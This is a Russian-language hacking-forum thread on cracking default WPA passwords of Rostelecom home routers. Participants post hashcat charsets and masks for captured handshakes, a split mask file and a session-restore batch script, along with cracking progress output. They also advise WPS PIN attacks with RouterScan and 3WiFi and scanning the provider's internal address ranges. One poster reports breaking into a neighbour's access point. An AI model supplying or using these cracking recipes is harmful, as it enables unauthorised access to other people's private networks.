Словари паролей RTK Ростелекома

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by quare, 6 Apr 2016.

  1. hydra

    hydra Well-Known Member

    Joined:
    24 Jul 2015
    Messages:
    1,050
    Likes Received:
    8,115
    Reputations:
    20
    Да ладно!:D;)
     
    Vovan19 likes this.
  2. iChill

    iChill New Member

    Joined:
    27 May 2018
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Подскажите набор символов для 88-A6-C6-BD-XX-XX RT-WiFi_XXXX
    уже прогнал 3467ACDEFGHJKMNPQRTUXY
    сейчас поставил 3467ACDEFGHJKMNPQRTUXYabc
    Может что то не так настроил?

    Guess.Mask.......: ?1?1?1?1?1?1?1?1 [8]
    Guess.Charset....: -1 3467ACDEFGHJKMNPQRTUXYabc, -2 Undefined, -3 Undefined, -4 Undefined
    Guess.Queue......: 1/1 (100.00%)
    Recovered........: 0/3 (0.00%) Digests, 0/1 (0.00%) Salts
    Progress.........: 36197498880/152587890625 (23.72%)
    Rejected.........: 0/36197498880 (0.00%)
    Restore.Point....: 1427374080/6103515625 (23.39%)
    Candidates.#1....: CcEcDGb7 -> CUKG6Uc7
    Candidates.#2....: QTGCGbXT -> QUUDEYQ7
    Candidates.#3....: TcUGNTb7 -> TQXXFCQ7
    Candidates.#4....: QKNaR7XT -> QYUY7Xb7
    Candidates.#5....: JaEN6Ab7 -> J7FbMHQ7
     
  3. Kakoluk

    Kakoluk Well-Known Member

    Joined:
    14 Aug 2015
    Messages:
    612
    Likes Received:
    846
    Reputations:
    5
    Вроде всё верно. (-1 3467ACDEFGHJKMNPQRTUXYabc ?1?1?1?1?1?1?1?1)
    Если только хозяин не установил PSK отличный от провайдера. А такое не редко случается(судя по выборке с 3WiFi).
    А вообще, вы отчаянный. :)
    ASUS PIN к своему MAC пробовали? (https://3wifi.stascorp.com/wpspin)
    Если у вас есть доступ к локальному пулу ртк(вы в местной сети ростелекома), можно заодно отсканировать локалку.
    Дело в том, что не все подсети получают внешний IP(сидят за NAT).
    Посмотрите на 3WiFi(на карте вашей местности) ==>> Перейти к списку диапазонов.
    Обычно диапазоны 100.XXX.XXX.XXX/16 используются ртк. Достать их конечно можно только из изнутри.
    Всё равно пока брутится...
     
    #123 Kakoluk, 29 May 2018
    Last edited: 29 May 2018
    iChill, DSL2650NRU and Payer like this.
  4. iChill

    iChill New Member

    Joined:
    27 May 2018
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Спасибо за ответ, пока пытаюсь разобраться..
    Первая же точка(МТС) сбрутилась за 5 секунд с помощью wifite
    А вот три хендшейка РТК пока не могу сбрутить. Уже прогнал через все словари которые смог найти, в том числе телефоны России, пробовал по маске договоров 77...
    Подключали инет все недавно т.к. дом - новостройка.
    У меня доступа к сети РТК нет, а на счёт пинов асус не смог ничего найти, как их проверить?
     
  5. Kakoluk

    Kakoluk Well-Known Member

    Joined:
    14 Aug 2015
    Messages:
    612
    Likes Received:
    846
    Reputations:
    5
    C помощью ПО которое умеет работать с протоколом WPS(PIN). Их много. Для любых систем. RouterScan(2.60), обладает таким функционалом.
     
  6. iChill

    iChill New Member

    Joined:
    27 May 2018
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Значит, если пароль не меняли то по этой маске должно сбрутиться?
    Знакомые недавно подключали РТК(в другом доме) и у них пароль такого вида 0XXXXXXX но там и имя сети по другому принципу построено - RTRouter_цифры серийного номера роутера (00-1F-CE-EF)
    А здесь я не видел "0" в наборах для брута РТК
     
  7. DSL2650NRU

    DSL2650NRU Active Member

    Joined:
    12 Apr 2016
    Messages:
    265
    Likes Received:
    168
    Reputations:
    1
    Брутить надо на чем нибудь очень мощном. Я бы все таки проверил сачала на впс по совету https://forum.antichat.ru/threads/439557/page-7#post-4213660. Это ровно одна минута.
     
  8. iChill

    iChill New Member

    Joined:
    27 May 2018
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Да уже б проверил RouterScan, но к точке доступа только через несколько дней поеду - брут быстрее завершится.
     
  9. Kakoluk

    Kakoluk Well-Known Member

    Joined:
    14 Aug 2015
    Messages:
    612
    Likes Received:
    846
    Reputations:
    5
    Тогда для удобства(масштабирования) можно побить маску на куски:
    Для записи в *.hcmask
    Code:
    3467ACDEFGHJKMNPQRTUXYabc,3?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,4?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,6?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,7?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,A?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,C?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,D?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,E?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,F?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,G?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,H?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,J?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,K?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,M?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,N?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,P?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,Q?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,R?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,T?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,U?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,X?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,Y?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,a?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,b?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,c?1?1?1?1?1?1?1
    
    Для командной строки/GUI(в поле "Mask"):
    Code:
    -1 3467ACDEFGHJKMNPQRTUXYabc  3?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  4?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  6?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  7?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  A?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  C?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  D?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  E?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  F?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  G?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  H?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  J?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  K?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  M?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  N?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  P?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  Q?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  R?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  T?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  U?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  X?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  Y?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  a?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  b?1?1?1?1?1?1?1
    -1 3467ACDEFGHJKMNPQRTUXYabc  c?1?1?1?1?1?1?1
    
    Например, для параллельного брута кусков маски на нескольких машинах.
    Для удобства остановки/перезапуска брута(с прерванного места), можно завести в папке кота "пакетник" *.bat
    с содержимым:
    Code:
    @GOTO START
    Во время работы "кота" создаётся файл, в который
    ежеминутно записывается состояние сессии: "all.restore".
    Для её восстановления(с прерваного места): переименовать "all.restore" в "Hashcat.restore"
    :START
    ren all.restore Hashcat.restore
    hashcat64.exe --restore
    pause
    
    Это может облегчить жизнь. :)
     
    #129 Kakoluk, 30 May 2018
    Last edited: 30 May 2018
    Veil, user100, iChill and 1 other person like this.
  10. iChill

    iChill New Member

    Joined:
    27 May 2018
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Не хочет брать маску из файла в таком виде.
    Ваш код я сохраняю в файл и указываю к нему путь в поле Mask, в поле Charset ничего не пишу.
    В итоге - Custom-charset 1 is undefined.
    До этого я уже пробовал вписать
    Charset: 3467ACDEFGHJKMNPQRTUXYabc
    в Mask прописывал путь к файлу со списком
    Code:
    A?1?1?1?1?1?1?1
    C?1?1?1?1?1?1?1
    D?1?1?1?1?1?1?1
    тоже не получилось.
    Так что либо прописывать полную маску, либо менять после каждого символа(25 раз)

    Я начал разбираться с роутер скан и пока не пойму как он поможет если я не знаю в каком диапазоне нужные мне точки доступа.
    А для этих координат 3wifi показыввает 10 диапазонов РТК в том числе и локальные.

    И ASUS PIN для этого мак показал вероятность - 97%
     
  11. Andrey9999

    Andrey9999 Elder - Старейшина

    Joined:
    23 May 2012
    Messages:
    1,489
    Likes Received:
    10,482
    Reputations:
    53
    через запятую надо:
    3467ACDEFGHJKMNPQRTUXYabc,3?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,4?1?1?1?1?1?1?1
    3467ACDEFGHJKMNPQRTUXYabc,6?1?1?1?1?1?1?1
     
    iChill, Kakoluk and hydra like this.
  12. Kakoluk

    Kakoluk Well-Known Member

    Joined:
    14 Aug 2015
    Messages:
    612
    Likes Received:
    846
    Reputations:
    5
    Пардон, досадная и глупая синтаксическая ошибка с моей стороны, воистину(поправил). :)
     
    Andrey9999, iChill and hydra like this.
  13. DSL2650NRU

    DSL2650NRU Active Member

    Joined:
    12 Apr 2016
    Messages:
    265
    Likes Received:
    168
    Reputations:
    1
    Вкладка Wireless Networks вам поможет. Она работает с беспроводными интерфейсами.
     
    iChill and Kakoluk like this.
  14. iChill

    iChill New Member

    Joined:
    27 May 2018
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Буду пробовать.. конечно доставляет сложностей то что именно эта вкладка не работает в линуксе.
     
  15. iChill

    iChill New Member

    Joined:
    27 May 2018
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    По набору 3467ACDEFGHJKMNPQRTUXYabc не удалось сбрутить хендшейк точки РТК.
    Я думаю нет смысла брутить соседнюю точку по этому же набору, скорее всего там пароли вида - khqHMeHB
    Router scan wireless networks тоже не смог ничего сделать с роутерами от РТК.
     
  16. iChill

    iChill New Member

    Joined:
    27 May 2018
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Удалось сбрутить соседнюю точку 90-4D-4A-82-**-** там действительно нужно брутить по этой же маске 3467ACDEFGHJKMNPQRTUXYabc
     
  17. gwin

    gwin Member

    Joined:
    7 Jan 2018
    Messages:
    10
    Likes Received:
    5
    Reputations:
    0
    ктонибудь брутил такие точки RT-GPON-67A6. недавно появилась в доме сигнал хороший, маски для eltex-ов вроде непододят
     
  18. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,166
    Likes Received:
    8,057
    Reputations:
    105
    Без BSSID ничего дельного не подсказать.
     
    gwin likes this.
  19. Payer

    Payer Elder - Старейшина

    Joined:
    14 May 2010
    Messages:
    828
    Likes Received:
    3,280
    Reputations:
    49
    похоже 78:81:02:7A*
    там вроде wps 0000000 у всех
    и ключ сети небрутабельный за вменяемое время
     
  20. Kakoluk

    Kakoluk Well-Known Member

    Joined:
    14 Aug 2015
    Messages:
    612
    Likes Received:
    846
    Reputations:
    5
    Ну всё таки, предположительно, некоторые соответствия прослеживаются.
    (ниже, ещё интереснее, не попало в скрин) Поиск.png
    Брут конечно рулетка, но когда это нас останавливало? ;):)
    В качестве "последней надежды":), рекомендую для единичного графического ускорителя с мощностью от ~100 wpa килохешей/сек:
    https://www.weakpass.com/download
    Weakpass 2.0 Wi-Fi - выручал неоднократно
    Weakpass 2.0 A - этот совсем страшный(включает в себя первый).
     
    #140 Kakoluk, 29 Dec 2018
    Last edited: 29 Dec 2018
    gwin likes this.
Loading...